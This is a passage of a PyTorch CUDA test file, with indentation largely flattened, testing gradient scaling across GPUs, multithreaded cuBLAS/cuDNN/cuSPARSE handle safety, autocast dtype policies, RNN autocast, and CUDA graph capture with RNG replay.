optimizer0.zero_grad()
optimizer1.zero_grad()
output0 = model0(input)
output1 = model1(input)
loss0 = loss_fn(0.3 * output0 + 0.7 * output1, target)
loss1 = loss_fn(0.6 * output0 - 0.4 * output1, target)
if try_scaling_api:
scaler.scale(loss0).backward(retain_graph=True)
scaler.scale(loss1).backward()
if i == skip_iter and scaler.is_enabled():
model1[1].weight.grad.data.fill_(float('inf'))
# As an additional stress test, separately unscale for one of the optimizers.
scaler.unscale_(optimizer0)
scaler.step(optimizer0)
scaler.step(optimizer1)
scaler.update()
else:
loss0.backward(retain_graph=True)
loss1.backward()
optimizer0.step()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer1.step()
run(mod_control0, mod_control1, opt_control0, opt_control1, False)
run(mod_scaling0, mod_scaling1, opt_scaling0, opt_scaling1, True)
# The loss scale should have been multiplied by the growth factor 3 times and the backoff factor once.
self.assertTrue(scaler.get_scale() == (128. * scaler.get_growth_factor()**3 *
scaler.get_backoff_factor()**1) if enabled else 1.0)
for c, s in zip(chain(mod_control0.parameters(), mod_control1.parameters()),
chain(mod_scaling0.parameters(), mod_scaling1.parameters())):
self.assertEqual(c, s, rtol=1e-5, atol=1e-7)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_multigpu(self):
# Same as above, but runs some of the models on device 1.
# GradScaler should transparently handle losses and gradients on multiple devices.
# This test could be combined with the test above, but I think it makes sense to treat
# multi-GPU operations separately.
dev0 = torch.device("cuda:0")
dev1 = torch.device("cuda:1")
for enabled in True, False:
mod_control0, mod_scaling0, opt_control0, opt_scaling0, data, loss_fn, skip_iter = \
self._create_scaling_case()
mod_control1, mod_scaling1, opt_control1, opt_scaling1 = \
self._create_scaling_models_optimizers(device=dev1)
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
def run(model0, model1, optimizer0, optimizer1, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer0.zero_grad()
optimizer1.zero_grad()
output0 = model0(input)
output1 = model1(input.to(dev1))
loss0 = loss_fn(0.3 * output0 + 0.7 * output1.to(dev0), target)
loss1 = loss_fn(0.6 * output0.to(dev1) - 0.4 * output1, target.to(dev1))
if try_scaling_api:
scaler.scale(loss0).backward(retain_graph=True)
scaler.scale(loss1).backward()
if i == skip_iter and scaler.is_enabled():
model1[1].weight.grad.data.fill_(float('inf'))
# As an additional stress test, separately unscale for one of the optimizers.
scaler.unscale_(optimizer0)
scaler.step(optimizer0)
scaler.step(optimizer1)
# Make sure the found_infs were collected properly across optimizers and devices.
if scaler.is_enabled():
self.assertTrue(len(scaler._found_inf_per_device(optimizer0)) == 1)
self.assertTrue(len(scaler._found_inf_per_device(optimizer1)) == 1)
self.assertTrue(scaler._found_inf_per_device(optimizer0)[dev0].item() == 0.)
self.assertTrue(scaler._found_inf_per_device(optimizer1)[dev1].item() ==
float(i == skip_iter))
scaler.update()
else:
loss0.backward(retain_graph=True)
loss1.backward()
optimizer0.step()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer1.step()
run(mod_control0, mod_control1, opt_control0, opt_control1, False)
run(mod_scaling0, mod_scaling1, opt_scaling0, opt_scaling1, True)
# The loss scale should have been multiplied by the growth factor 3 times and the backoff factor once.
self.assertTrue(scaler.get_scale() == (128. * scaler.get_growth_factor()**3 *
scaler.get_backoff_factor()**1) if enabled else 1.0)
# Copy mod_control1 and mod_scaling1 back to device 0 for comparison
mod_control1.to(dev0)
mod_scaling1.to(dev0)
for c, s in zip(chain(mod_control0.parameters(), mod_control1.parameters()),
chain(mod_scaling0.parameters(), mod_scaling1.parameters())):
self.assertEqual(c, s, rtol=1e-5, atol=1e-7)
def test_cublas_multiple_threads_same_device(self):
# Note: these parameters should be tuned very carefully.
# Too small a number makes it hard for the race condition
# to happen, while too large a number sometimes causes a hang.
size = 1024
num_threads = 2
trials = 3
test_iters = 100
weight = torch.ones((size, size), device='cuda')
results = {}
barrier = threading.Barrier(num_threads)
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for i in range(test_iters):
# If all threads are sharing the same cublas handle,
# the following sequence may occur:
# thread 0 calls cublasSetStream()
# thread 1 calls cublasSetStream()
# thread 0 launches its raw gemm, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS in its own stream,
# but actually now races with its gemm.
results[t] = torch.mm(results[t], weight)
results[t].div_(float(size))
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((size, size), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(), size * size)
# Test is flaky on Windows (https://github.com/pytorch/pytorch/issues/57401)
@unittest.skipIf(IS_WINDOWS, 'Test is flaky on Windows (see issue 57401)')
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
@skipIfRocm
def test_cudnn_multiple_threads_same_device(self):
# This function is intended to test the lazy creation and reuse of per-thread
# cudnn handles on each device in aten/src/ATen/cudnn/Handles.cpp.
# Failure here likely indicates something wrong with that logic.
weight = torch.ones((1, 1, 2, 2), device='cuda')
results = {}
num_threads = 2
trials = 3
test_iters = 1000
barrier = threading.Barrier(num_threads)
with torch.backends.cudnn.flags(enabled=True):
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for _ in range(test_iters):
# If all threads are sharing the same cudnn handle,
# the following sequence may occur:
# thread 0 calls setCuDNNStreamToCurrent()
# thread 1 calls setCuDNNStreamToCurrent()
# thread 0 launches its raw convolution, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS in its own stream,
# but now races with its convolution.
results[t] = torch.nn.functional.conv2d(results[t], weight, padding=0)
results[t].div_(4.0)
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((1, 1, 2048, 2048), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(),
(2048 - test_iters) * (2048 - test_iters))
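# Same idea as the cuBLAS/cuDNN tests above, but exercising sparse-dense mm
# from multiple threads, each on its own stream. `weight` is an all-ones
# matrix stored as sparse COO, so after each mm + div_ the result should
# still sum to size * size.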
def test_cusparse_multiple_threads_same_device(self):
size = 1024
num_threads = 2
trials = 3
test_iters = 500
def ones_sparse(size):
a = torch.arange(size, device='cuda')
indices = torch.cartesian_prod(a, a).t()
values = torch.ones(size * size, device='cuda')
return torch.sparse_coo_tensor(indices, values)
weight = ones_sparse(size)
results = {}
barrier = threading.Barrier(num_threads)
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for i in range(test_iters):
# If all threads are sharing the same cublas handle,
# the following sequence may occur:
# thread 0 calls cublasSetStream()
# thread 1 calls cublasSetStream()
# thread 0 launches its raw gemm, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS in its own stream,
# but actually now races with its gemm.
results[t] = weight.mm(results[t])
results[t].div_(float(size))
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((size, size), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(), size * size)
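# Shared driver for the autocast op-list tests below: runs `op` under
# autocast through the module-level and Tensor-method variants, checks that
# the output dtype matches the expected cast policy, and compares the
# numerics against explicitly casting the inputs to run_as_type with autocast
# disabled (which should be bitwise identical).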
def _run_autocast_outofplace(self, op, args, run_as_type, out_type=None, module=torch, add_kwargs=None):
# helper to cast args
def cast(val, to_type):
if isinstance(val, torch.Tensor):
return val.to(to_type) if val.is_floating_point() else val
elif isinstance(val, collections.abc.Iterable):
return type(val)(cast(v, to_type) for v in val)
else:
return val
if add_kwargs is None:
add_kwargs = {}
fast_dtype = torch.bfloat16 if run_as_type == torch.bfloat16 else torch.float16
self.assertFalse(torch.is_autocast_enabled())
with torch.autocast('cuda', dtype=fast_dtype):
self.assertTrue(torch.is_autocast_enabled())
out_type = out_type if out_type is not None else run_as_type
output = output_method = None
# Try module.* variant, if requested:
if module is not None and hasattr(module, op):
output = getattr(module, op)(*args, **add_kwargs)
if isinstance(output, torch.Tensor):
self.assertTrue(out_type == output.dtype,
"autocast for torch.{} produced {}, should produce {}"
.format(op, output.dtype, out_type))
# Try Tensor.* variant:
if hasattr(torch.Tensor, op):
output_method = getattr(args[0], op)(*args[1:], **add_kwargs)
if isinstance(output_method, torch.Tensor):
self.assertTrue(out_type == output_method.dtype,
"autocast for torch.{} produced {}, should produce torch.{}"
.format(op, output_method.dtype, out_type))
self.assertTrue((output is not None) or (output_method is not None),
"{} not found as an attribute on either Tensor or the requested module {}".format(
op, module))
# Accounts for ops that return Tensors, iterables, and other non-Tensors.
# For example, lstm_cell returns a tuple and equal returns bool.
def compare(first, second):
if isinstance(first, torch.Tensor):
return torch.equal(first, second)
elif isinstance(first, collections.abc.Iterable):
return all(compare(f, s) for f, s in zip(first, second))
else:
return first == second
# If both torch.* and Tensor.* variants were found, check outputs are identical
if (output is not None) and (output_method is not None):
self.assertTrue(type(output) == type(output_method))
comparison = compare(output, output_method)
self.assertTrue(comparison, "torch.{0} result did not match Tensor.{0} result".format(op))
# Compare numerics to Python-side "autocasting" that (we expect) does the same thing
# as the C++-side autocasting, and should be bitwise accurate.
output_to_compare = output if output is not None else output_method
with torch.autocast('cuda', enabled=False):
self.assertFalse(torch.is_autocast_enabled())
if module is not None and hasattr(module, op):
control = getattr(module, op)(*cast(args, run_as_type), **add_kwargs)
else:
control = getattr(args[0].to(run_as_type), op)(*cast(args[1:], run_as_type), **add_kwargs)
self.assertTrue(type(output_to_compare) == type(control))
comparison = compare(output_to_compare, control)
self.assertTrue(comparison, "torch.{} result did not match control".format(op))
self.assertTrue(torch.is_autocast_enabled())
self.assertFalse(torch.is_autocast_enabled())
def args_maybe_kwargs(self, op_with_args):
if len(op_with_args) == 2:
return op_with_args[0], op_with_args[1], {}
else:
return op_with_args[0], op_with_args[1], op_with_args[2]
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op_with_args in self.autocast_lists.torch_fp16:
skip_test = False
op, args = op_with_args[0], op_with_args[1]
if len(op_with_args) == 3:
skip_test = op_with_args[2] # TEST_WITH_ROCM
if not skip_test:
self._run_autocast_outofplace(op, args, torch.float16)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_bf16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op_with_args in self.autocast_lists.torch_fp16:
skip_test = False
op, args = op_with_args[0], op_with_args[1]
if len(op_with_args) == 3:
skip_test = op_with_args[2] # TEST_WITH_ROCM
should_error_from_not_implemented = 'cudnn' in op or 'prelu' in op or 'thnn' in op \
or 'fused' in op or 'gru' in op or op == '_thnn_fused_lstm_cell' or op == 'lstm_cell'
if not skip_test:
if should_error_from_not_implemented:
with self.assertRaises(RuntimeError, msg=str(op) + ' should not be supported for bfloat16!'):
self._run_autocast_outofplace(op, args, torch.bfloat16)
else:
if torch.cuda.is_bf16_supported():
self._run_autocast_outofplace(op, args, torch.bfloat16)
else:
with self.assertRaisesRegex(RuntimeError, 'Device does not support bfloat16'):
self._run_autocast_outofplace(op, args, torch.bfloat16)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_fp32(self):
for op_with_args in self.autocast_lists.torch_fp32:
op, args, maybe_kwargs = self.args_maybe_kwargs(op_with_args)
self._run_autocast_outofplace(op, args, torch.float32, add_kwargs=maybe_kwargs)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_need_autocast_promote(self):
for op, args in self.autocast_lists.torch_need_autocast_promote:
self._run_autocast_outofplace(op, args, torch.float32)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_expect_builtin_promote(self):
for op, args, out_type in self.autocast_lists.torch_expect_builtin_promote:
self._run_autocast_outofplace(op, args, torch.float32, out_type=out_type)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.nn_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_bf16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.nn_fp16:
if torch.cuda.is_bf16_supported():
self._run_autocast_outofplace(op, args, torch.bfloat16, module=torch._C._nn)
else:
with self.assertRaisesRegex(RuntimeError, 'Device does not support bfloat16'):
self._run_autocast_outofplace(op, args, torch.bfloat16, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_fp32(self):
for op, args in self.autocast_lists.nn_fp32:
self._run_autocast_outofplace(op, args, torch.float32, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_linalg_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.linalg_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=torch._C._linalg)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.methods_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=None)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_fp32(self):
for op, args in self.autocast_lists.methods_fp32:
self._run_autocast_outofplace(op, args, torch.float32, module=None)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_expect_builtin_promote(self):
for op, args, out_type in self.autocast_lists.methods_expect_builtin_promote:
self._run_autocast_outofplace(op, args, torch.float32, module=None, out_type=out_type)
def test_autocast_banned(self):
with torch.autocast('cuda'):
for op, args, module in self.autocast_lists.banned:
with self.assertRaises(RuntimeError):
getattr(module, op)(*args)
def test_autocast_ignored_types(self):
with torch.autocast('cuda'):
for ignore_type in (torch.double, torch.int32):
a_ignore = torch.ones((8, 8), dtype=ignore_type, device="cuda:0")
b_ignore = torch.ones((8, 8), dtype=ignore_type, device="cuda:0")
c_16 = torch.ones((8, 8), dtype=torch.float16, device="cuda:0")
# Tests if CastPolicy::fp16 ops ignore double and int
# Currently, no ops belonging to this policy support integer inputs.
if ignore_type is torch.double:
with self.assertRaises(RuntimeError):
torch.mm(a_ignore, c_16)
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.mm(a_ignore, b_ignore).dtype
self.assertTrue(torch.mm(a_ignore, b_ignore).dtype is type_no_autocast)
# Tests if CastPolicy::fp32 ops ignore double and int
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.pow(a_ignore, 2.0).dtype
self.assertTrue(torch.pow(a_ignore, 2.0).dtype is type_no_autocast)
# Tests if CastPolicy::fp32_set_opt_dtype ops ignore double and int
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.sum(a_ignore).dtype
self.assertTrue(torch.sum(a_ignore).dtype is type_no_autocast)
# Tests if CastPolicy::fp32_append_dtype ops ignore double and int
# Currently, no ops belonging to this policy support integer inputs.
if ignore_type is torch.double:
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.norm(a_ignore).dtype
self.assertTrue(torch.norm(a_ignore).dtype is type_no_autocast)
def test_autocast_custom_enabled(self):
class MyMM(torch.autograd.Function):
@staticmethod
@torch.cuda.amp.custom_fwd
def forward(ctx, a, b):
self.assertTrue(a.dtype is torch.float32)
self.assertTrue(b.dtype is torch.float32)
self.assertTrue(torch.is_autocast_enabled())
ctx.save_for_backward(a, b)
return a.mm(b)
@staticmethod
@torch.cuda.amp.custom_bwd
def backward(ctx, grad):
self.assertTrue(torch.is_autocast_enabled())
a, b = ctx.saved_tensors
return grad.mm(b.t()), a.t().mm(grad)
mymm = MyMM.apply
x = torch.randn((8, 8), device="cuda", dtype=torch.float32, requires_grad=True)
y = torch.randn((8, 8), device="cuda", dtype=torch.float32, requires_grad=True)
with torch.cuda.amp.autocast():
output = mymm(x, y)
self.assertTrue(output.dtype is torch.float16)
loss = output.sum()
loss.backward()
def test_autocast_custom_cast_inputs(self):
class MyMM(torch.autograd.Function):
@staticmethod
@torch.cuda.amp.custom_fwd(cast_inputs=torch.float32)
def forward(ctx, a, container, expect_type):
b = container[1][0]
self.assertTrue(a.dtype is expect_type)
self.assertTrue(b.dtype is expect_type)
self.assertFalse(torch.is_autocast_enabled())
ctx.save_for_backward(a, b)
return a.mm(b)
@staticmethod
@torch.cuda.amp.custom_bwd
def backward(ctx, grad):
self.assertFalse(torch.is_autocast_enabled())
a, b = ctx.saved_tensors
return grad.mm(b.t()), None, None
mymm = MyMM.apply
x = torch.randn((8, 8), device="cuda", dtype=torch.float16, requires_grad=True)
# Puts one input tensor in a nested container. y's contained Tensor won't receive a gradient,
# because torch.autograd.Function can't hand gradients back to non-Tensor forward arguments.
# Sets requires_grad=False explicitly so we don't lie about expecting a gradient.
y = (0, {0: torch.randn((8, 8), device="cuda", dtype=torch.float16, requires_grad=False)})
        with torch.autocast('cuda'):
output = mymm(x, y, torch.float32)
self.assertTrue(output.dtype is torch.float32)
loss = output.sum()
loss.backward()
# Tests if custom_fwd becomes a no-op when mymm runs outside an autocast-enabled region.
output = mymm(x, y, torch.float16)
self.assertTrue(output.dtype is torch.float16)
loss = output.sum()
loss.backward()
def test_autocast_cat_jit(self):
# Reported at https://github.com/pytorch/pytorch/issues/38958
class Model(torch.nn.Module):
def forward(self):
a = torch.randn(1)
b = torch.randn(1)
c = torch.cat((a, b), 0)
d = torch.stack([c, c], 0)
return d
# The JIT here doesn't really matter, we just need to call
# cat via the boxed API
model = Model()
model_jit_script = torch.jit.script(model)
with torch.autocast('cuda', enabled=True):
model()
model_jit_script()
# cudnn RNNs require special backend handling (weights are cast to FP16 and reflattened)
# so they get a dedicated test.
# Despite the large number of RNN cases it tries, the test takes < 15 seconds on a Titan V (similar to V100).
@skipIfRocm
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_rnn(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
# seq, batch, features, hidden size
clses = ("RNN", "GRU", "LSTM")
T, B, F, H = 3, 4, 5, 6
dtypes = (torch.float16, torch.float32)
input_layouts = ("seq_first", "batch_first", "packed")
for (cls, num_layers, bias, input_layout, bidirectional, try_nonpreflattened_weights,
input_dtype, hidden_dtype, weight_dtype) in \
product(clses, (1, 2), (True, False), input_layouts, (True, False), (True, False),
dtypes, dtypes, dtypes):
if input_layout == "seq_first":
batch_first = False
x = torch.randn((T, B, F), device="cuda", dtype=input_dtype)
elif input_layout == "batch_first":
batch_first = True
x = torch.randn((B, T, F), device="cuda", dtype=input_dtype)
elif input_layout == "packed":
batch_first = False
x = torch.randn((T, B, F), device="cuda", dtype=input_dtype)
x = torch.nn.utils.rnn.pack_padded_sequence(torch.randn((T, B, F),
device="cuda", dtype=input_dtype),
lengths=(3, 2, 1, 3),
enforce_sorted=False)
rnn = getattr(torch.nn, cls)(F, H, num_layers=num_layers, bidirectional=bidirectional,
bias=bias, batch_first=batch_first).cuda().to(dtype=weight_dtype)
if try_nonpreflattened_weights:
for p in rnn.parameters():
with torch.no_grad():
p.set_(p.clone())
h = torch.randn((num_layers * (2 if bidirectional else 1), B, H),
device="cuda", dtype=hidden_dtype)
if cls == "LSTM":
c = torch.randn((num_layers * (2 if bidirectional else 1), B, H),
device="cuda", dtype=hidden_dtype)
h = (h, c)
                with torch.autocast('cuda'):
out, h_out = rnn(x, h)
out = out.data if input_layout == "packed" else out
self.assertEqual(out.dtype, torch.float16)
# Autocast wrapper requires at::_cudnn_rnn is autograd-exposed. This check can't guarantee
# at::_cudnn_rnn is autograd-exposed, but if it fires, it indicates some funny business has
# occurred and we should double check that at::_cudnn_rnn remains autograd-exposed.
self.assertEqual(out.grad_fn.name(), "CudnnRnnBackward0")
out.sum().backward()
grads = [p.grad.clone() for p in rnn.parameters()]
rnn.zero_grad()
if cls == "LSTM":
out_control, h_out_control = rnn.to(dtype=torch.float16)(x.half(), (h[0].half(), h[1].half()))
else:
out_control, h_out_control = rnn.to(dtype=torch.float16)(x.half(), h.half())
out_control = out_control.data if input_layout == "packed" else out_control
out_control.sum().backward()
grads_control = [p.grad.clone() for p in rnn.parameters()]
# Compares with default tolerances, even for FP16 execution. Barring nondeterminism,
# autocast and control results should be bitwise identical.
self.assertEqual(out, out_control)
if cls == "LSTM":
self.assertTrue(h_out[0].dtype is torch.float16 and h_out[1].dtype is torch.float16)
self.assertEqual(h_out[0], h_out_control[0])
self.assertEqual(h_out[1], h_out_control[1])
else:
self.assertEqual(h_out.dtype, torch.float16)
self.assertEqual(h_out, h_out_control)
for grad, grad_control in zip(grads, grads_control):
self.assertEqual(grad.half(), grad_control)
def test_autocast_cache_leak(self):
# Reported at https://github.com/pytorch/pytorch/issues/48049
        # Checks that autocast does not keep re-caching the same parameters
        # when executed inside a `torch.no_grad()` block.
linear = torch.nn.Linear(10, 10).to('cuda')
data = torch.randn(1, 10, device='cuda')
        with torch.autocast('cuda'):
with torch.no_grad():
out = linear(data)
first_iter_mem = torch.cuda.memory_allocated()
for _ in range(3):
out = linear(data)
self.assertTrue(first_iter_mem == torch.cuda.memory_allocated())
def test_autocast_checkpointing(self):
model = torch.nn.Sequential(torch.nn.Linear(8, 8),
torch.nn.Linear(8, 8),
torch.nn.Linear(8, 8)).cuda()
input = torch.rand((8, 8), device="cuda", dtype=torch.float16, requires_grad=True)
        with torch.autocast('cuda'):
output = checkpoint_sequential(model, 2, input)
self.assertTrue(output.requires_grad)
self.assertTrue(output.dtype is torch.float16)
output.sum().backward()
@slowTest
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_max_large_axis(self):
x = torch.zeros(2**32, device='cuda', dtype=torch.int8)
x[-1] = 1
val, idx = x.max(0)
self.assertEqual(val, 1)
self.assertEqual(idx, x.shape[0] - 1)
@unittest.skipIf(not TEST_NUMPY, "Numpy not found")
def test_to_numpy(self):
self.assertRaises(TypeError, lambda: torch.empty(1, device="cuda").numpy())
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_capture_simple(self):
s = torch.cuda.Stream()
with torch.cuda.stream(s):
a = torch.full((1000,), 1, device="cuda")
g = torch.cuda.CUDAGraph()
torch.cuda.empty_cache()
g.capture_begin()
b = a
for _ in range(10):
b = b + 1
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
g.replay()
self.assertTrue(b.sum().item() == 11000.)
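    def _graph_capture_context_manager_sketch(self):
        # Illustrative sketch only, not part of the original suite (no test_ prefix, so
        # unittest does not collect it): the same capture/replay as
        # test_graph_capture_simple above, expressed with the torch.cuda.graph context
        # manager that later tests in this file (e.g. test_graph_grad_scaling) use.
        g = torch.cuda.CUDAGraph()
        a = torch.full((1000,), 1, device="cuda")
        with torch.cuda.graph(g):
            b = a
            for _ in range(10):
                b = b + 1
        g.replay()
        self.assertTrue(b.sum().item() == 11000.)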
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_rng_functional(self):
ops_with_kwargs = ((torch.nn.functional.dropout, {"p": 0.1}),
(torch.nn.functional.rrelu, {"training": True}),)
size = 10000
def run(op, kwargs):
a = torch.randn((size,), device="cuda", dtype=torch.float)
# Control
torch.cuda.manual_seed(5)
eager_out = a
for _ in range(6):
eager_out = op(eager_out, **kwargs)
graph_in = a.clone()
stream = torch.cuda.Stream()
stream.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(stream):
torch.cuda.manual_seed(5)
g = torch.cuda.CUDAGraph()
torch.cuda.empty_cache()
g.capture_begin()
graph_out = graph_in
for _ in range(2):
graph_out = op(graph_out, **kwargs)
g.capture_end()
torch.cuda.current_stream().wait_stream(stream)
# Runs a graphed->eager->graphed sequence of RNG ops.
# replay() plays 2 invocations of the op, so the sequence has 6
# invocations total, matching Control.
# replay() reads from graph_in and writes to graph_out.
g.replay()
out = op(graph_out, **kwargs)
out = op(out, **kwargs)
graph_in.copy_(out)
g.replay()
# If replay() updated RNG state correctly, graph_out
# should now hold data equal to eager_out.
try:
self.assertEqual(eager_out, graph_out)
except Exception as e:
raise RuntimeError("Failed on ", op) from e
# We hold references to all tensors used across streams up til this sync,
# so no need to call record_stream on those tensors.
torch.cuda.synchronize()
for op, kwargs in ops_with_kwargs:
run(op, kwargs)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_rng_distributions(self):
size = 10000
input = torch.rand((size,), device="cuda", dtype=torch.float)
alloc = torch.empty((size,), device="cuda", dtype=torch.float)
# Torch ops to test with sample args (tuple) and kwargs (dict)
torch_with_args = (("bernoulli", (input.clone(),), {}),
# multinomial uses some uncapturable CUDA calls.
# TODO: reenable multinomial tests if/when the implementation is capturable.
# ("multinomial", (input.clone(), size, True), {}),
# ("multinomial", (input.clone(), size // 2, False), {}),
# TODO: reenable normal test, where std is a device
# tensor, when graph test failures are fixed
# ("normal", (input.clone() + 1, input.clone()), {}),
("normal", (input.clone() + 1, 1.0), {}),
("poisson", (input.clone(),), {}),
("rand", (size,), {"device": "cuda", "dtype": torch.float}),
("randint", (0, 3, (size,)), {"device": "cuda", "dtype": torch.float}),
("randn", (size,), {"device": "cuda", "dtype": torch.float}),)
# Tensor methods to test with sample args (tuple)
tensor_with_args = (("bernoulli_", (input.clone(),)),
("cauchy_", ()),
("exponential_", ()),
("geometric_", (0.3,)),
("log_normal_", ()),
("normal_", ()),
("random_", ()),
("uniform_", ()),)
def run(module, op, args, kwargs):
torch.cuda.manual_seed(5)
# Each path runs a dummy op to increment the state a bit before creating controls.
if (module == "torch"):
dummy = getattr(torch, op)(*args, **kwargs)
control1 = getattr(torch, op)(*args, **kwargs)
control2 = getattr(torch, op)(*args, **kwargs)
else:
dummy = alloc.clone()
control1 = alloc.clone()
control2 = alloc.clone()
getattr(dummy, op)(*args)
getattr(control1, op)(*args)
getattr(control2, op)(*args)
stream = torch.cuda.Stream()
stream.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(stream):
torch.cuda.manual_seed(5)
g = torch.cuda.CUDAGraph()
torch.cuda.empty_cache()
if (module == "torch"):
g.capture_begin()
t1 = getattr(torch, op)(*args, **kwargs)
t2 = getattr(torch, op)(*args, **kwargs)
g.capture_end()
else:
t1 = alloc.clone()
t2 = alloc.clone()
g.capture_begin()
getattr(t1, op)(*args)
getattr(t2, op)(*args)
g.capture_end()
torch.cuda.current_stream().wait_stream(stream)
try:
self.assertNotEqual(control1, t1)
self.assertNotEqual(control2, t2)
except Exception as e:
raise RuntimeError("Failed on " + module + "." + op) from e
# Runs a dummy op prelude, as for controls, to make sure replay()
# picks up the dummy op's state increment.
if module == "torch":
dummy = getattr(torch, op)(*args, **kwargs)
else:
dummy = alloc.clone()
getattr(dummy, op)(*args)
# Runs RNG ops that fill t1 and t2.
g.replay()
try:
self.assertEqual(control1, t1)
self.assertEqual(control2, t2)
except Exception as e:
raise RuntimeError("Failed on " + module + "." + op) from e
# We hold references to all tensors used across streams up til this sync,
# so no need to call record_stream on those tensors.
torch.cuda.synchronize()
for op_with_args in torch_with_args:
run("torch", *op_with_args)
for meth_with_args in tensor_with_args:
# Adds an empty dict for kwargs, which none of the Tensor methods use
run("Tensor", *(meth_with_args + ({},)))
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_two_successive(self):
torch.cuda.empty_cache()
size = 1000
kSmallBuffer = 2097152
def func_with_temps(t, val):
x = t.clone() + val
y = t.clone() + val
return x + y
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
g0 = torch.cuda.CUDAGraph()
g1 = torch.cuda.CUDAGraph()
a = torch.ones((size,), device="cuda")
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda.graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
for _ in range(5):
b = func_with_temps(b, 1)
g0.capture_end()
g1_args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*g1_args)
for _ in range(5):
b = func_with_temps(b, 1)
g1.capture_end()
torch.cuda.current_stream().wait_stream(s)
# mixes unrelated eager ops with replays
